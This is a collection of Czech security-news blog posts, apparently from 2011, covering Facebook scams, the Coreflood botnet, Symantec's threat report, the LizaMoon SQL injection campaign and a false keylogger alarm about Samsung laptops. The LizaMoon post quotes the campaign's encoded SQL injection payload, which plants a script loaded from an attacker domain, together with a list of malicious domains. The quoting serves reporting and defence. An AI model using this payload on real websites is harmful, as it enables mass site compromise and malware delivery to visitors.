Na Facebooku opět řádí „Podívej se kdo se díval na tvůj profil“

View who has viewed your profile!“ je zpět v plné síle a na klasické podvodné schéma se chytají spolehlivě i čeští uživatelé. A to přesto, že po nich chce komplikované kopírování a jde o roky známý podvod. Pokračovat ve čtení „Na Facebooku opět řádí „Podívej se kdo se díval na tvůj profil““

Tvůrci virů a malware se naučili využívat Google Images

V More on Google image poisoning najdete detailní informace o způsobu využití Google Images, tedy vyhledávání obrázků, pro malware a viry. Nejčastější zneužití spočívá v přesměrování příchodů z Google Images na falešné antiviry.

Útočníci přitom využívají ve velké míře kompromitované (hacknuté) weby – na tyto weby umisťují PHP skripty, které generují obsah pro Google indexovací roboty podle toho, jaká klíčová slova zrovna chtějí využívat. Zajímavé je i to, že útok probíhá přímo na Google Images – není ani nutné, aby došlo k návštěvě webu – využívá se přitom toho, že Google zobrazuje „náhled“ na obrázek i web.

A právě web je zobrazen přímo v „pozadí“ – škodlivý skript tak snadno zjistí, že je zobrazen z Google a pokusí se o útok na počítač uživatele.

Útočníci už tímto způsobem využívají Google Docs více jak měsíc – Google bohužel zatím s žádným řešením nepřišel a jediné co občas udělá je odstranění informací z indexu vyhledávače.

Nejčastější využití je v podobě falešných antivirových programů (FakeAV) – uživateli je zobrazeno „varování“ falešného antivirového programu, včetně falešných výsledků o nalezených virech. Následně je mu nabídnut „antivirus“, který je ve skutečnosti malware.

Pokud vás zajímá konkrétní příklad, najdete jej například v Google Image Searches Leading To FakeAV Sites

„Watch the Osama Shoot down video“ spam na Facebooku

Nic překvapujícího, spammeři zaplavili Facebook „odkazy“ na „Watch the Osama Shoot down video“ a uživatelé Facebooku jim ještě pomáhají v šíření. Žádné video se nekoná, jde o klasicky clickjacking, commentjacking a likejacking

Osama is dead, watch this exclusive CNN video which was censored by Obama Administration due to level of violence, a must watch. Leaked by Wikileaks.

Mrtvý Osama stále neexistuje ani na fotografiích (ta jediná Fotka zabitého Osamy bin Laden je … samozřejmě podvrh), natož aby bylo k dispozici video. Tradičně platí, že Facebook nedokázal na další útok spammerů a podvodníků zareagovat. V nebývalé míře jsou využívání i Facebook Events (události).

Sophos: Otevřený dopis Facebooku ohledně bezpečí a soukromí (uživatelů)

facebook-zuckerberg-open-graphSophos vyzývá otevřeným dopisem (An open letter to Facebook about safety and privacy) Facebook k zlepšení péče o bezpečí a soukromí uživatelů. Varuje před každodenními případy zločinů a podvodů na Facebooku. Nabízí tři základní pravidla, která by Facebook měl začít dodržovat.

Soukromí jako standard

Je nutné ukončit praxi sdílení čehokoliv bez jasného souhlasu uživatele (opt-in). Přidávání nové funkčnosti sdílení informací o uživateli nemůže znamenat, že tato funkčnost bude automaticky povolena.

Prověření vývojářů aplikací

Je příliš snadné stát se vývojářem na Facebook – svědčí o tom více jak milion vývojářů aplikacích registrovaných na Facebook platformě. A není žádné překvapení, že Facebook je zaplaven škodlivými aplikace a virálními podvody. Pouze prověření a schválení vývojáři by měli mít svolení publikovat aplikace na platformě.

HTTPS pro všechno

Sophos vítá umožnění přístupu přes HTTPS, které je ale standardně vypnutí. A navíc je nabízeno jenom „tam kde je to možné“. Facebook by měl vynutit bezpečné spojení ve všech případech.

Komentář

Soukromí na Facebooku neexistuje a roky existence Facebooku stále ukazují, že Facebook dělá maximum pouze pro dosažení zisků – a vždy znovu a znovu zkouší, jak daleko může zajít. Uživatelé jsou navíc nepozorní, neuvědomují si možné důsledky svého chování a „bezpečnostní dialogy“ proklikávají tradičně bez čtení – zpravidla jsou stejně nic neříkající a pro technicky nezkušené uživatele jsou nesrozumitelné.

Facebook soukromí uživatelů ignoruje, ale nejenom v otázce sdílení informací – neochota jakkoliv s uživateli komunikovat v případě problémů (chybí jakákoliv uživatelská podpora) znamená i to, že případy zneužívání fotografií, ponižování či šikany nejsou Facebookem řešení buď vůbec, nebo až za týdny a měsíce. A jediná spolehlivá cesta jak přimět Facebook k reakci je dostat tyto případy do amerických médií.

Aplikace jsou rájem tvůrců virů, podvodů a všech dalších aktivit, které využívají volnost Facebooku a nezkušenost (a mnohdy až hloupost) uživatelů. Facebook navíc daleko spíše bude promazávat neškodné malé aplikace (a znepříjemňovat život firmám), než by věnoval pozornost skutečně nebezpečným aktivitám. Viry a podvody na Facebooku mají zpravidla hodiny až dny života. A za tuto dobu dokáží napáchat velké škody.

Škodlivé aplikace velmi dobře umí využívat všechny „výhody“, které jim Facebook dává – rozsáhlý přístup k informacím o uživatelích, možnost spamu, zneužívání Událostí, označování ve fotografiích. Ve většině případů by omezení podobných funkcí znamenalo výrazné omezení celého Facebooku a je velmi málo pravděpodobné, že Facebook bude ochoten jít touto cestou – ohrozil by tím vlastní příjmy. A peníze jsou přeci vždy až na prvním místě.

Otázka zavedení dalších schvalovacích procesů pro aplikace je dvousečná zbraň – s neschopností Facebooku zajistit služby v přijatelném čase a absurdní neochotou jakkoliv komunikovat by něco takového znamenalo efektivní znemožnění vývoje jakýchkoliv aplikací. Aby to bylo možné, bylo by navíc nutné výrazně omezit možnosti Open Graph API a všech souvisejících služeb.

Pravdou je, že přísnější dohled nad aplikacemi (a hlavně zrychlení reakcí na vznikající problémy) by výraznou měrou omezilo spam a podvody.

Bezpečné připojení v prohlížeči sice na Facebooku (už) používat můžete (víte-li kde si tuto volbu zapnout), ale implementace je nedostačující – zejména v okamžiku, kdy vstoupíte do nějaké aplikace – tam HTTPS není možné. Některé části Facebooku na HTTPS připojení navíc nefungují správně a chovají se chaoticky, takže používat toto bezpečnější připojení k Facebooku je spíše problém než něco, co by uživatelům pomáhalo.

HTTPS připojení je navíc nutné jenom tam, kde se uživatel nachází na nezabezpečené síti (viz FireSheep umožní získat přístup k Facebook účtům. Nejenom k nim), tedy tam kde je možné očekávat odchytávání komunikace někým jiným – Facebook na veřejné Wifi je typickým příkladem, kdy je nutné používat HTTPS připojení. Ve firemních či domácích sítích (pokud to není zrovna otevřené WiFi) taková nutnost zpravidla není.

Coreflood botnet odstaven, po zhruba deseti letech působení

Americké Ministerstvo spravedlnosti (DOJ) ve středu oznámilo zničení Coreflood botnet aktivit. Po skoro desetiletí působení soustřeďujícím se na krádeže osobních a  finančních informací od uživatelů.

„Coreflood“ je název řídícího programu, který ovládal rozsáhlou síť počítačů. Zásah DOJ vedl k zabavení pěti řídících serverů, 29 doménových jmen a vznesení obvinění proti 13 osobám. Ty jsou velmi pravděpodobně cizí národnosti. Coreflood aktivity mohly oběti připravit až o vice než 100 milionů dolarů.

Součástí odstavení sítě bylo i převzetí aktivit řídících serverů, zjištění adres všech ovládaných počítačů o odeslání pokynu k zastavení aktivit pro tyto počítače. DOJ tak učinil na základě soudního svolení a mírně paradoxní je, že pokyn k zastavení odeslal pouze do počítačů umístěných v USA. Počítače získané do Coreflood sítě ale zůstávají potenciální hrozbou – při každém novém spuštění takovéhoto počítače se software znovu aktivuje a může začít pracovat, případně může začít být ovládáno odjinud.

Podle Coreflood/AFcore Trojan Analysis jde o jednu z nejdéle a bez přerušení pracujících botnet aktivit s více než 378 tisící infikovanými počítači. Od jednoduchého software používaného k napadání IRC (Internet Relay Chat) serverů se Coreflood stal později nástrojem pro anonymní přístup k internetu. A nakonec se stal nástrojem pro krádež informací. Dařilo se mu, mimo jiné, vynikat i v míře nakažení rozsáhlých firemních sítí (viz obrázek zobrazující míru nakažení sítě velkého hotelového řetězce).

Symantec: Dramaticky roste počet i rafinovanost kybernetických hrozeb

Každoroční Internet Security Threat Report (ISTR) od Symantecu je venku. V pořadí již šestnáctý přehled o aktivitách kyberzločinců je zajímavé čtení. Místy ohromuje čísly (286 milionů nových hrozeb v roce 2010), místy nutí k přemýšlení nad tím, jak pokročilé jsou metody autorů virů a malware.

Symantec upozorňuje, že dochází v růstu v počtu cílených útoků na firmy a útoky jsou stále důmyslnější. Útočníci rozšířili své aktivity do sociálních sítí, začali více využívat Javu a větší pozornost věnují mobilním zařízením.

Nejdůležitější informace ve zprávě

  • 286 miliónů nových hrozeb – Různé varianty a nové mechanismy, jako jsou webové útočné sady, i nadále zvyšují objem škodlivých programů. Symantec zaznamenal v roce 2010 více než 286 milionů unikátních škodlivých programů.

  • O 93 % více útoků spojených s webovými stránkami – Počet webových útočných sad vzrostl o 93 % v roce 2010. Růst zapříčinilo i použití zkrácených URL.

  • Únik 260 000 identit při jednom narušení – Jedná se o průměrný počet identit uniklých při narušení dat způsobené hackováním v průběhu roku 2010.

  • 14 nových 0day zranitelností – Zranitelnosti nultého dne hrály klíčovou roli u cílených útoků, včetně Hydraq a Stuxnet. Stuxnet používal čtyři různé zranitelnosti nultého dne, což je zcela unikátní.

  • 6 253 nových zranitelností – Symantec zaznamenal v roce 2010 více zranitelností než kdykoli dříve.

  • O 42 % více mobilních zranitelností – Počítačoví zločinci se začínají více zaměřovat na mobilní zařízení, o čemž svědčí i nárůst zranitelností operačních systémů ze 115 v roce 2009 na 163 v roce 2010.

  • Jeden botnet s více než milionem spambotů – Rustock, největší botnet roku 2010, měl pod svou kontrolou více než jeden milion botů. Ostatní velké botnety, jako Grum a Cutwail, měly stovky tisíc botů.

  • 74 % spamu spojeno s farmaceutickými produkty – Téměř tři čtvrtiny veškeré nevyžádané pošty bylo v roce 2010 spojeno s farmaceutickými výrobky.

  • 15 $ za 10 000 botů – Symantec zaznamenal ve fórech podzemní ekonomiky reklamu, která lákala na cenu 15 $ za 10 000 infikovaných počítačů. Boti se obvykle používají k rozesílání spamu nebo ke kampaním na falešný sofware (například vybízí ke koupi falešného antiviru), ale ve stále větší míře se používají k útokům DDoS.

  • 0,07 $ až 100 $ za kreditní kartu – Cena za údaje o kreditní kartě byla na fórech podzemní ekonomiky velmi různorodá. Cenu ovlivňovaly různé faktory, jako je vzácnost karty nebo sleva při hromadném nákupu.

Stuxnet a Hydraq, dva z nejznámějších počítačových útoků v roce 2010, představovaly reálné případy kybernetické války a zásadně změnily povahu hrozeb,” říká Stephen Trilling, senior vice president, Symantec Security Technology and Response. „Hrozby se více rozšiřují a nezaměřují se jen na jednotlivé bankovní účty, ale  také na informace a fyzické infrastruktury národních států.

Rok 2010: Rok cílených útoků

Cílené útoky, jako jsou Hydraq a Stuxnet, znamenaly pro firmy v roce 2010 ještě větší nebezpečí. Útočníci pro proniknutí do počítačových systémů stále častěji využívali 0day zranitelnosti, což zvyšovalo pravděpodobnost úspěchu a znesnadňovalo jejich identifikaci. Například Stuxnet v tomto ohledu byl zcela unikátní, jelikož využíval hned čtyři různé zranitelnosti nultého dne.

V roce 2010 se útočníci zaměřili na společnosti obchodující s cennými papíry na burze, nadnárodní korporace, vládní agentury i řadu menších firem. Přesně cílené sociální inženýrství jim pak umožnilo přístup do firemní sítě – cílem byly krádeže duševního vlastnictví i získávání osobních údajů. Nabourání do sítě a narušení dat v průměru vyústilo v únik 260 000 identit v roce 2010, což je téměř čtyřnásobek, než způsobily jiné způsoby úniku.

Sociální sít, fenomén i pro kyberzločin

Jedna z hlavních útočných technik používaných na stránkách sociálních sítí bylo zkracování URL. Zkrácené URL slouží k efektivnímu sdílení jinak komplikovaných webových adres v e-mailu nebo na webových stránkách. V minulém roce využili útočníci milióny těchto zkrácených odkazů na webové stránky na sociálních sítích a dramaticky zvýšili účinnost phishingových a malwarových útoků.

Na sociální síti se odkazy automaticky šíří přes přátele oběti a během několika minut se odkaz může šířit na stovky až tisíce uživatelů. 65 % škodlivých odkazů v nových příspěvcích, které zaznamenala společnost Symantec, používalo zkrácené URL. Na 73 % z nich bylo kliknuto minimálně 11-krát a na 33 % bylo kliknuto 11-krát až 50-krát.

Mobilní telefony jsou novým užitečným nástrojem

Užitečným nástrojem nejenom pro jejich vlastníky, ale také pro hacking, spam, podvody a řadu dalších podobných aktivit. V roce 2010 měla většina malwarových útoky na mobilní zařízení podobu trojského koně, který se tvářil jako legitimní aplikace. Útočníci řadu aplikací vytvořili zcela od začátku, ale v mnoha případech infikovali již existující legitimní aplikace. Útočníci potom tyto nakažené aplikace distribuovali v běžných internetových obchodech s aplikacemi. Například autoři Pjapps Trojan použili tento přístup.

LizaMoon SQL injection útok stále pokračuje, až 1.5 milionu nakažených stránek

SQL Injection útok pojmenovaný LizaMoon v Google indexu ukazuje už na 559 tisíc nalezených výsledků a TrendLabs upozorňuje na další rozšíření používaných domén.

LizaMoon, Etc. SQL Injection Attack Still Ongoing upozorňuje, že LizaMoon útočníci rozšířili počet domén, které používají pro spouštění útočného kódu. Útoky zatím stále pokračuje a pokud se podíváte na čísla v Google, tak od prvního dubna došlo k zdvojnásobení počtu zjištění nakažených adres. Podle GCN je nakaženo až 1.5 milionu webových stránek.

V ČR jsou viditelné tři nakažené weby – stavebnistandardy.cz, forum.mzh.cz a filatelie-stosek.cz, tady jeden nový od prvního dubna. Napadení počítačů návštěvníků těchto webů podle Trend Micro probíhá pomocí TROJ_FAKEAV.BBK a TROJ_WORID.A. Návštěvník napadené stránky je přesměrován na nabídku falešného antiviru (Windows Stability Center), který se klasickým podvodem snaží uživatele přesvědčit, že jeho počítač je zavirovaný a měl by si pořídit (falešný) antivir. Pokud uživatel nabízený falešný antivir nainstaluje, je ztracen.

Zdroj: Update on LizaMoon mass-injection and Q&A

Počet používaných domén pro útočný skript už jde do desítek

lizamoon.com/ur.php
tadygus.com/ur.php
alexblane.com/ur.php
alisa-carter.com/ur.php
online-stats201.info/ur.php
stats-master111.info/ur.php
agasi-story.info/ur.php
general-st.info/ur.php
extra-service.info/ur.php
t6ryt56.info/ur.php
sol-stats.info/ur.php
google-stats49.info/ur.php
google-stats45.info/ur.php
google-stats50.info/ur.php
stats-master88.info/ur.php
eva-marine.info/ur.php
stats-master99.info/ur.php
worid-of-books.com/ur.php
google-server43.info/ur.php
tzv-stats.info/ur.php
milapop.com/ur.php
pop-stats.info/ur.php
star-stats.info/ur.php
multi-stats.info/ur.php
google-stats44.info/ur.php
books-loader.info/ur.php
google-stats73.info/ur.php
google-stats47.info/ur.php
google-stats50.info/ur.php

WebSense (odkud je také předchozí seznam používaných domén) nabízí i pohled na kód používaný pro SQL Injection, další detaily nabízí Attack on ASP site that uses a SQL server database na StackOverflow.com

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)

+as+varchar(8)))–

Prozatím není jasné jak je SQL Injection využíváno – známé je, že se týká pouze webů používajících Microsoft SQL Server. A také, že nejde o chybu v MSSQL – je využívána chyba v nějakém jiném software, které tyto weby používají.

SQL Injection útok uspěl až na stovkách tisíc adres

Stovky tisíc kompromitovaných webových adres v masivním útoku využívajícím SQL Injection, vsunutí SQL kódu do neošetřeného vstupu webové aplikace. Vsouván je odkaz s útočným skriptem kdy je uživatel přesměrován na podvodné „antivirové“ software.

Chyba při zpracování vstupních parametrů umožňuje útočníkům využít tzv. SQL Injection – vsunutí SQL kódu. Ten se potom spustí ve webové aplikaci a umožní vložit data do SQL serveru. Používá se jako tradiční prostředek pro hacking, ale své využití má už řadu let ve vkládání spamu – zejména odkazů na útočný kód.

K tématu :

Čerstvá vlna útoku vkládá odkaz na JavaScript z domén lizamoon.com a  alisa-carter.com (v obou případech odkaz vede na ur.php a obě domény jsou aktuálně odstavené a nefunkční). Než se útoku podařilo zamezit odstavením používaných domén, odkaz návštěvníka napadeného webu zavedl na nabídku podvodného „antivirového“ software.

Útočný kód se dostal i na tak prominentní místa jako je Apple iTunes – najdete ho na stránkách některých produktů. Nedostal se tam napadením iTunes, ale zvenčí, přes data získávána přes RSS a importovaná do produktových stránek. Útočný kód na iTunes je nefunkční – Apple příchozí RSS zpracovává způsobem, který zamezuje vykonání.

Aktuální vlna útoků je dokumentována websense v LizaMoon mass injection hits over 226,000 URLs (was 28,000) a pohledem do Google můžete snadno zjistit, kolik URL je již v indexu Google  -(aktuálně 292 tisíc pro lizamoon.com variantu a 98 tisíc pro alisa-carter.com variantu). Problém se nevyhnul ani České republice – v indexu Google najdete napadený web StavebniStandardy.cz a filatelie-stoesk.cz.

Velmi pravděpodobně ale existují ještě další varianty umístění útočného skriptu – hledání na ur.php v Google nabízí 291 tisíc výsledku a další rozdílné domény – google-stats50.info, multi-stats.info, google-stat48,info, alexblane.com a řadu dalších.

Samsung nedává na notebooky keylogger, falešný poplach

Skandál, Samsung měl podle jednoho zdroje (který se nikdo dlouho nenamáhal prověřit) dávat na své počítače keylogger. Šmírovací software umožňující vědět co uživatel píše a pořizovat screenshoty. Falešný alarm antivirového software. Samsung je nevinný.

Samsung installs keylogger on its laptop computers informuje o alarmujícím zjištění. Na čerstvě koupeném notebooku od Samsungu je keylogger – StarLogger, který má být důkladně skrytý před antivirovými a antimalware programy je zjištění přítomnost jedné složky na disku (viz citace níže).

While setting up a new Samsung computer laptop with model number R525 in early February 2011, I came across an issue that mirrored what Sony BMG did six years ago.  After the initial set up of the laptop, I installed licensed commercial security software and then ran a full system scan before installing any other software. The scan found two instances of a commercial keylogger called StarLogger installed on the brand new laptop. Files associated with the keylogger were found in a c:windowsSL directory.

Článek dokonce přímo zmiňuje, že „This key logger is completely undetectable and starts up whenever your computer starts up. “ – tedy, že keylogger není možné detekovat a spouští se při spuštění počítače.

Skandál, pokud by něco takového byla pravda. Článek má pokračování (Samsung responds to installation of keylogger on its laptop computers), ve kterém dochází k zásadnímu zjištění – technická podpora Samsungu prý potvrdila, že tento software Samsung na počítače instaluje.

He confirmed that yes, Samsung did knowingly put this software on the laptop to, as he put it, „monitor the performance of the machine and to find out how it is being used.“

Třetí pokračování, Samsung investigating report of keylogger on its laptops, informuje o zahájení šetření.

Aféra?

Těžko říct, protože o něco později přichází False alarm over Samsung keylogger, které upozorňuje, že samotná přítomnost c:windowssl složky na disku vede u antivirových programů k mylnému konstatování, že je přítomen právě StarLogger keylogger. A také že tato složka je vytvářena Microsoft Live instalační procedurou. Potvrzuje to i Samsung laptos are in fact secure (Samsung Tomorrow) a ukazuje jak k omylu došlo – použitím antivirového software VIPRE.

Jeden z mála, kdo se vydal ověřit skutečnost, byl Mikko Hypponen z F-Secure – keylogger se mu na Samsung noteboocích najít nepodařilo (No keyloggers on Samsung laptops as far as we know)

No, we did not find StarLogger, or any keyloggers from the laptops we tested. These included Samsung R540, RF710, QX310, SF510, X125 and NF310. They were all running different versions of Windows 7. Note that the list includes Samsung R540, which was one of the laptop models mentioned in the original Network World report.

Na praktický test navazuje v Confirmed: Samsung is not shipping keyloggers a potvrzuje zde zjištění, že šlo o mylný výsledek testu právě od VIPRE antivirového produktu. VIPRE k „zjištění přítomnost keyloggeru“ dokonce stačí prázdná c:windowssl složka.

Infografika: Historie malware na Twitteru

Twitter oslavil pět let existence (Happy Birthday Twitter!) a Kaspersky Lab shrnuje historii malware v Twitter – Malware through time. Kaspersky oprávněně upozorňuje, že Twitter se stal nástrojem šíření virů a malware – využívání trendů i hacknutých účtů patří dnes k nástrojům útočníků velmi často.

V roce 2010 se na Twitter zaměřila i americká FTC (Federal Trade Commission) – vedlo to k zavedení řady opatření na zvýšení bezpečnosti. Jak už je ale zvykem, největším nebezpečím pro uživatele jsou oni sami. Byť velkou měrou přispěl sám Twitter – naposledy v září 2010, kdy došlo k masivnímu využití „MouseOver“ v novém webovém rozhraní Twitteru.